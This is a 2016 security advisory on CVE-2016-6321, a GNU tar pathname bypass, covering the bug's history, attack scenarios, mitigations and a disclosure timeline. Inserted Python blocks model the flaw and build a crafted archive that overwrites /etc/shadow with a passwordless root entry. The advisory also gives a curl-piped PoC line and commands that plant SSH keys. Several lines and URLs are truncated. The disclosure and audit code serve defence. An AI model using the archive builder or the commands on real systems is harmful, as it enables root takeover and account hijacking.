
GNU tar 1.29 Extract Pathname Bypass

Posted Oct 27, 2016
Authored by Harry Sintonen

The GNU tar archiver can be tricked into extracting files and directories in the given destination, regardless of the path name(s) specified on the command line. Versions 1.14 through 1.29 are affected.

tags | exploit, bypass
advisories | CVE-2016-6321
MD5 | d3225fb0115eb0e014c2558c2c124a7d

---------------- t2'16 special vulnerability release -----------------

Vulnerability: POINTYFEATHER aka Tar extract pathname bypass
Credits: Harry Sintonen / FSC1V Cyber Security Services
Date: 2016-10-27
Impact: File overwrite in certain situations
Classifier: Full spectrum cyber
CVSS: 4.3.2
Threat level: Manatee


In a time when 0days are hoarded and exchanged for
local currencies in different parts of the world,
F-Secure CSS is going old-school and dropping a
not-so-valuable vulnerability, for free as in beer.

Tar will happily extract files & directories into
an arbitrary location when supplied with a suitably
crafted archive file. If a target system is extracting
an attacker supplied file, the vulnerability can
be exploited to gain file overwrite capability.

We have exploited this vulnerability in environments
where tar was run as root to gain root access on the
target. In most scenarios this is a non-issue, however
as we have witnessed, corner cases can be quite

After the communication with different parties was
discontinued for more than 42 days, the decision was
made to proceed with our honorable disclosure policy.

Greets to our Swedish friends olleb, Linus, Daniel W,
Ludde - see you at t2!

[ASCII-art logo; spacing lost in extraction]

Denmark · Finland · Poland · Sweden · Norway
Cyber Industrial Complex since '07


CVE-2016-6321 - GNU tar extract pathname bypass
The latest version of this advisory is available at:


GNU `tar' archiver can be tricked into extracting files and
directories in the given destination, regardless of the path
name(s) specified on the command line.


GNU `tar' archiver attempts to avoid path traversal attacks
by removing offending parts of the element name at extract.
This sanitizing leads to a vulnerability where the attacker
can bypass the path name(s) specified on the command line.


The attacker can create a crafted tar archive that, if
extracted by the victim, replaces files and directories
the victim has access to in the target directory, regardless
of the path name(s) specified on the command line.


The discovered vulnerability, described in more detail below,
enables file and directory overwrite attacks against the user
or system by using a crafted tar archive. The attack requires
that the victim or system extract the crafted tar archive prepared
by the attacker. Automated systems extracting paths from archives
originating from untrusted sources are in particular danger,
especially if the extract operation is performed with elevated

In the worst-case scenario this vulnerability can lead to a full
system compromise (remote code execution as root).

1. Extract pathname bypass due to safer_name_suffix usage

The safer_name_suffix() function in lib/paxnames.c sanitizes the `file_name'
parameter: when the `absolute_names' parameter is 0, it strips the file
system prefix, every leading component up to and including the last `..'
component, and any slashes that follow them. As a result, the path name
effectively becomes relative to the target directory, ignoring the
path name given on the command line.

The history of this bug is somewhat complicated:

- Before the 13.12.1999 commit it was possible to extract entries
with member names containing ".." sequence(s).
- In the 13.12.1999 commit the code was changed[1] to warn about
and skip member names that had ".." sequence(s):
`(extract_archive): By default, warn about ".." in member
names, and skip them.'
- However, in the 05.07.2003 commit the code was changed[2] to use
the `safer_name_suffix' function:
`(extract_archive): Use safer_name_suffix rather than rolling
our own.'

The unfortunate side effect of the 05.07.2003 change was that,
rather than skipping entries whose member names contain "..",
the code now attempts to make the malicious name safe. Making the
name safe involves stripping all offending path components, which
results in the target name being relative to the target directory
root, regardless of the requested path name. The command-line
selection (the requested member names and any --exclude rules) is
still applied to the original, unsanitized member name.

Here are a number of practical attack scenarios:

- Attack the user by replacing important files, such as
.ssh/authorized_keys, .bashrc, .bash_logout, .profile,
.subversion or .anyconnect, when they extract a tar archive.
For example:

user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \
--wildcards 'blurf*'
tar: Removing leading `blurf/../' from member names
user@host:~$ cat .ssh/authorized_keys
ssh-rsa AAAAB3...nU= mrrobot@fsociety

- Attack automation that extracts tar originating from a web
application or similar sources. Such operation might be performed by
a setuid root component of the application. The command executed
could be for example:

# tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

The attacker can overwrite /var/spool/cron/crontabs/root to gain code
execution as root. It is also possible to replace binaries commonly
executed by root with backdoored ones, or to drop setuid root
binaries that will enable the attacker to gain root privileges at
will. A common attack would be to replace some network-facing daemon
with a backdoored one, enabling covert code execution on demand.

This type of scenario has been successfully exploited in the real
world to gain a remote code execution as root in different

- Attack commands that try to replace single files/dirs as root:

The victim would like to replace `/etc/motd' file in the system by
extracting it from an archive obtained from an untrusted source:

# tar -C / -xvf archive.tar etc/motd
tar: Removing leading `etc/motd/../' from member names

The attacker can also bypass an --exclude rule if it is being used
with the --anchored switch. For example: the victim would like to extract
all files but `/etc/shadow' from an archive:

# tar -C / -xvf archive.tar --anchored --exclude etc/shadow
tar: Removing leading `etc/motd/../' from member names

In both cases, the attacker has now successfully replaced /etc/shadow
file with arbitrary content.

Exploiting the vulnerability works best if the attacker has some prior
knowledge of the specifics of the tar command line that gets executed.
The path prefix before the `..' sequence will need to (at least
partially) match the target path (or not match in case of the exclude
rule) in order for the bypass attack to work. Guessing which paths
the victim might extract could work too, but the success rate is
likely lower.
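The following is an added illustration, not code from the advisory or from GNU tar, of the mechanism described under "1. Extract pathname bypass" and of the three scenarios above. safer_name_suffix() reproduces the control flow of the lib/paxnames.c routine on a POSIX host (FILE_SYSTEM_PREFIX_LEN is 0 there); name_match() and excluded() are a simplified model of tar's default extract matching, in which a requested name or an anchored exclude pattern also covers everything below that directory, and they handle only the options the scenarios use. The ordering that makes the bypass work is that the command-line filters see the raw member name while the filesystem sees the sanitized one. The skip_dotdot switch models the advisory's first recommended change; its message text is this model's, not tar's.

```python
"""Model of the CVE-2016-6321 extract pathname bypass (added example).

Not code from the advisory or from GNU tar.  safer_name_suffix() follows the
control flow of lib/paxnames.c on a POSIX host (FILE_SYSTEM_PREFIX_LEN == 0).
name_match()/excluded() are a simplified model of tar's default extract
matching (a name or pattern also matches everything below that directory),
covering only the options used in the advisory's scenarios.
"""
import posixpath
from fnmatch import fnmatchcase


def safer_name_suffix(file_name, absolute_names=False):
    """Return (name tar extracts, stripped prefix), as tar 1.14 through 1.29 do.

    Every leading component up to and including the LAST ".." component is
    dropped, then any slashes after it.  Nothing is rejected: the result is
    always a name relative to the extraction directory.
    """
    if absolute_names:
        return file_name, ""
    n = len(file_name)
    prefix_len = 0
    p = 0
    while p < n:
        # a component that is exactly "..": the prefix now ends here
        if file_name.startswith("..", p) and (p + 2 == n or file_name[p + 2] == "/"):
            prefix_len = p + 2
        while p < n:                      # skip to the next component
            c = file_name[p]
            p += 1
            if c == "/":
                break
    p = prefix_len
    while p < n and file_name[p] == "/":  # and any slashes after the prefix
        p += 1
    prefix_len = p
    rest = file_name[prefix_len:]
    if not rest:                          # tar: "." for an empty name, else the last prefix char
        rest = "." if prefix_len == 0 else file_name[prefix_len - 1:]
    return rest, file_name[:prefix_len]


def _leading_paths(member):
    """'a/b/c' -> ['a', 'a/b', 'a/b/c']: tar matches a directory and its contents."""
    parts = member.split("/")
    return ["/".join(parts[:i]) for i in range(1, len(parts) + 1)]


def name_match(member, pattern, wildcards=False):
    """Does a name given on the command line select this member (raw name)?"""
    for sub in _leading_paths(member):
        if wildcards:
            if fnmatchcase(sub, pattern):
                return True
        elif sub == pattern:
            return True
    return False


def excluded(member, pattern):
    """Model of --anchored --exclude PATTERN: matched from the start of the raw name."""
    return name_match(member, pattern, wildcards=True)


def simulate_extract(members, dest, requested=(), excludes=(), wildcards=False,
                     skip_dotdot=False):
    """Return (paths written, warnings).  Filters see the RAW member name; the
    filesystem sees the sanitized one.  skip_dotdot=True models the advisory's
    first recommended change: refuse the entry instead of "making it safe"."""
    written, warnings, seen = [], [], set()
    for name in members:
        if requested and not any(name_match(name, r, wildcards) for r in requested):
            continue
        if any(excluded(name, e) for e in excludes):
            continue
        if skip_dotdot and ".." in name.split("/"):
            warnings.append("Skipping member name containing `..': %s" % name)  # model wording
            continue
        safe, prefix = safer_name_suffix(name)
        if prefix and prefix not in seen:     # tar warns once per distinct prefix
            seen.add(prefix)
            warnings.append("Removing leading `%s' from member names" % prefix)
        written.append(posixpath.normpath(posixpath.join(dest, safe)))
    return written, warnings


if __name__ == "__main__":
    # the advisory's "# tar -C / -xvf archive.tar etc/motd" scenario, constructed members
    crafted = ["etc/motd", "etc/motd/../etc/shadow"]
    for skip in (False, True):
        paths, warns = simulate_extract(crafted, "/", requested=["etc/motd"], skip_dotdot=skip)
        print("skip_dotdot=%s -> %s %s" % (skip, paths, warns))
```

Feeding the model the members from the scenarios above reproduces each bypass: `etc/motd` selects `etc/motd/../etc/shadow` and the file lands in /etc/shadow, `--anchored --exclude etc/shadow` never matches the crafted name, and `--wildcards 'blurf*'` lets `blurf/../.ssh/authorized_keys` through into the user's home. With skip_dotdot the same inputs write only the legitimate entries.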

Vulnerable versions

- GNU tar 1.14 to 1.29 (inclusive)

Affected operating systems

- Red Hat
- Alpine Linux
- Red Star OS
- any other Linux using GNU tar

Recommended changes to GNU tar

1. Skip entries with member names containing a '..', or fail the whole
tar extract operation. A proposed patch that mitigates the issue:


End user mitigation

1. If your OS distribution offers a fixed GNU tar version, install it


2. Only extract untrusted tar archives to a temporary directory in a
virtual machine


3. Prohibit full spectrum cyber operations in your enterprise.


$ curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
$ cat etc/shadow
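As an added example, not the advisory's tar-poc.tar (whose contents are not reproduced here) and not part of GNU tar, the following builds an archive with the member layout of the /etc/motd scenario using Python's tarfile module, which stores member names verbatim, and audits an archive for the member names and hard link targets that tar 1.14 through 1.29 would quietly rewrite. Member names and file contents are constructed for the example. Running it writes tar-poc.tar to the current directory; extracting that file with a vulnerable tar as `tar -C / -xvf tar-poc.tar etc/motd` behaves as described above, while a fixed tar does not extract the crafted entry.

```python
"""Craft an archive with CVE-2016-6321 style member names and audit it (added example).

Not the advisory's tar-poc.tar: member names and payloads are constructed here.
Python's tarfile writes member names verbatim, so a name such as
'etc/motd/../etc/shadow' is stored exactly as given.
"""
import io
import tarfile


def build_crafted_archive(entries):
    """Return tar bytes for (member_name, payload_bytes) pairs, names unmodified."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in entries:
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            info.mode = 0o644
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def poc_archive():
    """Member layout of the advisory's '/etc/motd' scenario (contents constructed)."""
    return build_crafted_archive([
        ("etc/motd", b"Welcome.\n"),
        # selected by 'tar -C / -xvf archive.tar etc/motd', written to /etc/shadow
        # by tar 1.14-1.29 after "Removing leading `etc/motd/../' from member names"
        ("etc/motd/../etc/shadow", b"root::0:0:99999:7:::\n"),
    ])


def unsafe_members(archive_bytes):
    """List (member_name, reason) for entries a vulnerable tar would rewrite.

    Checks the member name and, for hard links, the link target, since
    safer_name_suffix() is applied to both.  Symlink targets are listed too:
    tar does not rewrite them, but an absolute or '..' target is worth a look
    before extracting as root.  Run this before extracting an archive from an
    untrusted source and reject the archive if the list is not empty.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tf:
        for info in tf.getmembers():
            checks = [("name", info.name)]
            if info.islnk():
                checks.append(("hard link target", info.linkname))
            elif info.issym():
                checks.append(("symlink target", info.linkname))
            for what, path in checks:
                if path.startswith("/"):
                    findings.append((info.name, "absolute %s" % what))
                elif ".." in path.split("/"):
                    findings.append((info.name, "'..' component in %s" % what))
    return findings


if __name__ == "__main__":
    data = poc_archive()
    with open("tar-poc.tar", "wb") as f:   # for 'tar -C / -xvf tar-poc.tar etc/motd' on a vulnerable tar
        f.write(data)
    for name, reason in unsafe_members(data):
        print("%s: %s" % (name, reason))
```

The audit is the check an automated pipeline should run before the extract step described in the attack scenarios: a member name with a `..` component has no legitimate use in an archive you intend to extract under a fixed prefix, so the right response is to reject the whole archive, not to sanitize the name.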


[1] http://git.savannah.gnu.org/cgit/tar.git/commit/src/
[2] http://git.savannah.gnu.org/cgit/tar.git/commit/src/


10.03.2016 discovered the vulnerability
11.03.2016 wrote a preliminary advisory
11.03.2016 contacted the GNU tar maintainer for a PGP key
14.03.2016 revised the advisory with --anchored --exclude bypass
15.03.2016 reworked the advisory slightly
15.03.2016 sent the advisory to the GNU tar maintainer
16.03.2016 contacted secalert@redhat.com for help in coordination
17.03.2016 added end user mitigation via --one-top-level to the
17.03.2016 GNU tar maintainer didn't consider this to be an issue.
as a result mitigation in upstream GNU tar appears
23.03.2016 added more attack scenarios to the advisory
10.08.2016 reworked the advisory slightly
10.08.2016 polled secalert@redhat.com regarding the status of the
11.08.2016 CVE-2016-6321 was assigned to the vulnerability
15.09.2016 polled secalert@redhat.com regarding the status of the
26.10.2016 handcrafted the ascii release file at a lobby bar
27.10.2016 public release of the advisory at t2'16
30.10.2016 fixed the patch to use FATAL_ERROR. ref: